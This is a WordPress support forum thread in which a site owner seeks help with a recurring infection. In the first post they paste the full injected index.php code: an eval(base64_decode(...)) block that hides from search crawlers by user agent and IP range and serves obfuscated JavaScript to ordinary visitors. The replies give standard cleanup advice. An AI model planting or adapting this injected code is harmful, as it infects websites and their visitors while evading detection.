WordPress.org

Ready to get started?Download WordPress

Forums

My site is hacked with MW JS Depack? (7 posts)

  1. profmustamar
    Member
    Posted 2 years ago #

    Hello,..
    Everytime I open my website, my antivirus shows a warning. Then I check my site through http://sitecheck.sucuri.net/, it says that my website is infected with MW JS Depack.

    I check my installation, I found this in index.php (in all domain root) :

    eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycnJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOTEuMjU1IiksDQoJYXJyYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIpLA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKSwNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0KCWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4yNTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQoJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCSk7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30NCn0NCmlmICghJGJvdCkgew0KZWNobyBiYXNlNjRfZGVjb2RlKCJQSE5qY21sd2RENWxkbUZzS0daMWJtTjBhVzl1S0hBc1lTeGpMR3NzWlN4a0tYdGxQV1oxYm1OMGFXOXVLR01wZTNKbGRIVnliaWhqUEdFL0p5YzZaU2h3WVhKelpVbHVkQ2hqTDJFcEtTa3JLQ2hqUFdNbFlTaytNelUvVTNSeWFXNW5MbVp5YjIxRGFHRnlRMjlrWlNoakt6STVLVHBqTG5SdlUzUnlhVzVuS0RNMktTbDlPMmxtS0NFbkp5NXlaWEJzWVdObEtDOWVMeXhUZEhKcGJtY3BLWHQzYUdsc1pTaGpMUzBwZTJSYlpTaGpLVjA5YTF0alhYeDhaU2hqS1gxclBWdG1kVzVqZEdsdmJpaGxLWHR5WlhSMWNtNGdaRnRsWFgxZE8yVTlablZ1WTNScGIyNG9LWHR5WlhSMWNtNG5YRngzS3lkOU8yTTlNWDA3ZDJocGJHVW9ZeTB0S1h0cFppaHJXMk5kS1h0d1BYQXVjbVZ3YkdGalpTaHVaWGNnVW1WblJYaHdLQ2RjWEdJbksyVW9ZeWtySjF4Y1lpY3NKMmNuS1N4clcyTmRLWDE5Y21WMGRYSnVJSEI5S0NkeUlHNG9OU2w3TXlCaVBWd25kMXduT3pNZ1l6MW9JR1VvS1R0cktETWdhVDB3TzJrOGVEdHBLeXNwZTJOYllpNW1LR2srUGpRcEsySXVaaWhwSm5VcFhUMTBMbkVvYVNsOU5pZ2hOUzV6S0M5ZVcyRXRkaTA1WFNva0wya3BLVzhnZVRzMktEVXVaeVV5S1RVOVhDY3dYQ2NyTlRzeklHdzlOUzVuT3pNZ056MW9JR1VvS1RzeklHbzlNRHRyS0RNZ2FUMHdPMms4YkR0cEt6MHlLWHMzVzJvcksxMDlZMXMxTGtFb2FTd3lLVjE5YnlBM0xub29YQ2RjSnlsOU5pZzRMbTB1UXloY0ozQTlaRnduS1QwOUxURXBlemd1UWlodUtGd25SRnduS1NrN09DNXRQVnduY0Qxa1hDZDlKeXcwTUN3ME1Dd25mSHg4ZG1GeWZIeGtZWFJoZkdsbWZISmxjM1ZzZEh4a2IyTjFiV1Z1ZEh4OGZHSXhObDlrYVdkcGRITjhZakUyWDIxaGNIeGxibUZpYkdWa2ZFRnljbUY1ZkdOb1lYSkJkSHhzWlc1bmRHaDhibVYzZkh4OFptOXlmR3hzZkdOdmIydHBaWHhvUkdOa2ZISmxkSFZ5Ym54amIyOXJhV1ZvZkdaeWIyMURhR0Z5UTI5a1pYeG1kVzVqZEdsdmJueHRZWFJqYUh4VGRISnBibWQ4TVRWOFpqQjhNREV5TXpRMU5qYzRPV0ZpWTJSbFpud3lOVFo4Wm1Gc2MyVjhhbTlwYm54emRXSnpkSEo4ZDNKcGRHVjhhVzVrWlhoUFpud3pZelkwTmprM05qSXdOek0zTkRjNU5tTTJOVE5rTWpJM01EWm1Oek0yT1RjME5qazJaalpsTTJFeU1EWXhOakkzTXpabU5tTTNOVGMwTmpVellqSXdObU0yTlRZMk56UXpZVEl3TW1Rek1UTTVNemt6TXpjd056Z3pZakl3TnpRMlpqY3dNMkV5TURKa016SXpPVE01TXpFM01EYzRNMkl5TWpObE0yTTJPVFkyTnpJMk1UWmtOalV5TURjM05qazJORGMwTmpnelpESXlNelF6TURJeU1qQTJPRFkxTmprMk56WTROelF6WkRJeU16SXpNREl5TWpBM016Y3lOak16WkRJeU5qZzNORGMwTnpBellUSm1NbVkyTmpjMk5qVTNZVFkzTm1FM05qSmxOMkUzT1RabE56TXlaVFl6Tm1ZMlpESm1ObVEyTVRZNU5tVXlaVGN3TmpnM01ETm1OekEyTVRZM05qVXpaRFl6TXpZek9UWXlOalF6TURNeU5qVXpPVE16TmpVek5qTTVNelV6TnpZek1qSXpaVE5qTW1ZMk9UWTJOekkyTVRaa05qVXpaVE5qTW1ZMk5EWTVOell6WlNjdWMzQnNhWFFvSjN3bktTd3dMSHQ5S1NrOEwzTmpjbWx3ZEQ0PSIpOw0KfQ=='));

    I cleaned all of them, but they are keep coming, and infect my index.php file.
    I check a post by victorciobanu: http://www.victorciobanu.com/how-to-remove-mwjsdepack/ but I think this is different, because I don't see any problem with wp-settings.php

    I also has removed my wordpress installation, and re-install it, but the malware keeps coming.

    I hope someone have a solution for this.

    Thank you...

  2. profmustamar
    Member
    Posted 2 years ago #

    Bump!

  3. kmessinger
    Volunteer Moderator
    Posted 2 years ago #

  4. perezbox
    Member
    Posted 2 years ago #

    I would look beyond this one install. Do you run other websites on the same server? Often case the vulnerability is not the site that is infected, rather one that is not showing infected.

    I would also check all your folder and file permissions, perhaps you're being to relaxed in that department.

    I'd also encourage you to work via SFTP or SSH instead of FTP, not sure what you use, but a small tidbit none the less.

    Also, if you haven't already, change all your credentials using a sterile environment. FTP/SFTP/ SSH, WP-ADMIN, Database, try not to use the same password for all and ensure they are complex ones.

    Thanks

  5. poddys
    Member
    Posted 2 years ago #

    I have a very similar problem, and this code has infected all my sites on the host, even changing .html files. It's in the Theme and Plugin files, even Akismet, and in some of the .php files it occurs up to 50 times!

    I changed the passwords (on the host manually), removed all users except the 3 necessary ones in the WP database, deleted the Theme, installed a basic theme, re-installed WordPress, removed the malicious code from all the files, checked for backdoors, changed the WP security keys etc etc etc. Within hours everything was infected yet again.

    I have looked under TimThumb as it sounds similar, but I don't use this plugin, and the code looks different to the examples. I am seeing more sites on Google with the signature of this code, just search for "v532b5" and see how many come up!

    I would love to know how to get rid of this, and hope my database isn't infected too, as I don't want to lose 3 years worth of blogging.

  6. profmustamar
    Member
    Posted 2 years ago #

    @poddys, all you need to do is to upgrade your wordpress core.
    Then make your index.php and .htaccess 444.

  7. I would love to know how to get rid of this, and hope my database isn't infected too, as I don't want to lose 3 years worth of blogging.

    This reply is a day late but if you haven't already, please make backups NOW.

    http://codex.wordpress.org/WordPress_Backups
    http://codex.wordpress.org/Backing_Up_Your_Database
    http://codex.wordpress.org/Restoring_Your_Database_From_Backup

    Keep those off your server somewhere safe. Those backups will be suspect but having them is still better than potentially losing everything.

    As profmustamar said upgrade. But still read up on the standard reading list and apply that advice.

    http://codex.wordpress.org/FAQ_My_site_was_hacked

    http://wordpress.org/support/topic/268083#post-1065779
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    http://ottopress.com/2009/hacked-wordpress-backdoors/

    Within hours everything was infected yet again.

    You really need to treat all the files as suspect and delete what you can. Get fresh copies from the source and put those fresh copies back after you delete the files you have. Seriously, make that backup NOW and get ready to restore if you have to.

    Good luck.

Topic Closed

This topic has been closed to new replies.

About this Topic